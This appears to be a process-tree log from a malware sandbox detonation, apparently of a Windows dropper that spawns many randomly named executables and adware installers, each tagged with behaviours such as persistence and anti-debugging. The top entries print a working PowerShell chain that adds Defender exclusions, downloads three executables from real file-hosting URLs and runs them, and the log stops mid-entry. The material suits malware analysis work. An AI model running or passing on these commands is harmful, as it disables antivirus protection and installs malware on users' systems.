"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
7⤵
PID:7904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
8⤵
PID:3804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
8⤵
PID:7372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
8⤵
PID:5252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
8⤵
PID:8360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
8⤵
PID:4792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
8⤵
PID:7636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
8⤵
PID:8392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
8⤵
- Blocklisted process makes network request
PID:8600

C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
9⤵
PID:6728

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
10⤵
PID:3308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
11⤵
PID:8540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
11⤵
PID:8080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
11⤵
- Modifies registry class
PID:8384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
11⤵
PID:896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
8⤵
- Suspicious use of SendNotifyMessage
PID:4264

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
9⤵
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: SetClipboardViewer
PID:6024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
8⤵
PID:6348

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
9⤵
- Suspicious use of SetThreadContext
PID:7020

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"{path}"
10⤵
PID:2608

C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe
"C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe"
6⤵
PID:6980

C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe
"C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe"
6⤵
- Suspicious use of SetThreadContext
PID:4872

C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe
C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe
7⤵
PID:7084

C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe
"C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7064

C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe
"C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe"
6⤵
PID:7128

C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe
"C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe"
6⤵
PID:4932

C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe
"C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe" -q
7⤵
PID:2456

C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe
"C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe"
6⤵
PID:7032

C:\Users\Admin\AppData\Roaming\2584156.exe
"C:\Users\Admin\AppData\Roaming\2584156.exe"
7⤵
PID:8056

C:\Users\Admin\AppData\Roaming\5515754.exe
"C:\Users\Admin\AppData\Roaming\5515754.exe"
7⤵
- Suspicious behavior: SetClipboardViewer
PID:6892

C:\Users\Admin\AppData\Roaming\3230219.exe
"C:\Users\Admin\AppData\Roaming\3230219.exe"
7⤵
PID:5964

C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe
"C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe"
6⤵
PID:6092

C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe
"C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe"
6⤵
- Suspicious use of SetThreadContext
PID:5604

C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe
C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe
7⤵
PID:7792

C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe
"C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe"
6⤵
PID:6392

C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe
"C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe"
6⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2460

C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe
"C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"
6⤵
PID:6532

C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe
"C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"
7⤵
- Modifies data under HKEY_USERS
PID:300

C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe
"C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe"
6⤵
PID:6672

C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe
"C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6468

C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe
"C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe"
6⤵
PID:6248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 668
7⤵
- Program crash
PID:7264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 652
7⤵
- Program crash
PID:7660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 680
7⤵
- Program crash
PID:7960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 636
7⤵
- Program crash
PID:8088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 1128
7⤵
- Program crash
PID:7436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 1076
7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5864

C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe
"C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe"
6⤵
- Suspicious use of SetThreadContext
PID:5368

C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe
C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe
7⤵
PID:7724

C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe
"C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe"
6⤵
PID:5780

C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe
"C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7252

C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
"C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe"
6⤵
- Suspicious use of SetThreadContext
PID:7244

C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
7⤵
PID:5548

C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
7⤵
PID:5820

C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe
"C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7236

C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe
"C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe"
6⤵
PID:7228

C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe
"C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"
6⤵
PID:5252

C:\Users\Admin\AppData\Local\Temp\is-5QRTQ.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5QRTQ.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp" /SL5="$402DE,138429,56832,C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"
7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:7492

C:\Users\Admin\AppData\Local\Temp\is-MH328.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MH328.tmp\Setup.exe" /Verysilent
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5420

C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:8484

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
10⤵
- Executes dropped EXE
PID:5636

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
PID:5340

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5128

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:5148

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:7672

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 028F6052A2FE8BC8C915EF71D623C722 C
2⤵
- Loads dropped DLL
PID:5868

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding EC92D0FE9FD9F6C81FC82B7F1C1F2A45 C
2⤵
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
PID:6312

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E1B3CB1C65ADCF600ADC47B52EDD9692 C
2⤵
- Loads dropped DLL
PID:6808

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B982EE1D12FC5573F3D061FDE4B3E4C6
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4240

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
2⤵
- Adds Run key to start application
PID:5276

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
3⤵
- Loads dropped DLL
- Adds Run key to start application
PID:9124

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--Ac4FtzsAeC"
4⤵
- Checks computer location settings
PID:5268

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffa8d3c9ec0,0x7ffa8d3c9ed0,0x7ffa8d3c9ee0
5⤵
PID:8372

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=2132 /prefetch:8
5⤵
PID:4700

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=1772 /prefetch:8
5⤵
PID:9172

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1696 /prefetch:2
5⤵
PID:8928

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2616 /prefetch:1
5⤵
- Checks computer location settings
PID:8832

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2204 /prefetch:2
5⤵
PID:4224

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=2200 /prefetch:8
5⤵
PID:2276

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3420 /prefetch:8
5⤵
PID:8392

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3280 /prefetch:8
5⤵
- Suspicious use of SendNotifyMessage
PID:7520

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3344 /prefetch:8
5⤵
PID:8028

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3412 /prefetch:8
5⤵
PID:8812

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D327.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
3⤵
- Blocklisted process makes network request
PID:2320

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7756

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:5580

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8736

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:6948

C:\Users\Admin\AppData\Local\Temp\CE4F.exe
C:\Users\Admin\AppData\Local\Temp\CE4F.exe
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6788

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:8672

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6724

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
PID:6452

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:8204

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{75031801-02a9-6e4f-9ca6-98660627b607}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:9088

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"
2⤵
PID:5152

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:6592

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:3472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:8948

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6024

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4428

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5152

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
- Suspicious use of SetWindowsHookEx
PID:5176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8384

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5132

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5204

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:8612

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
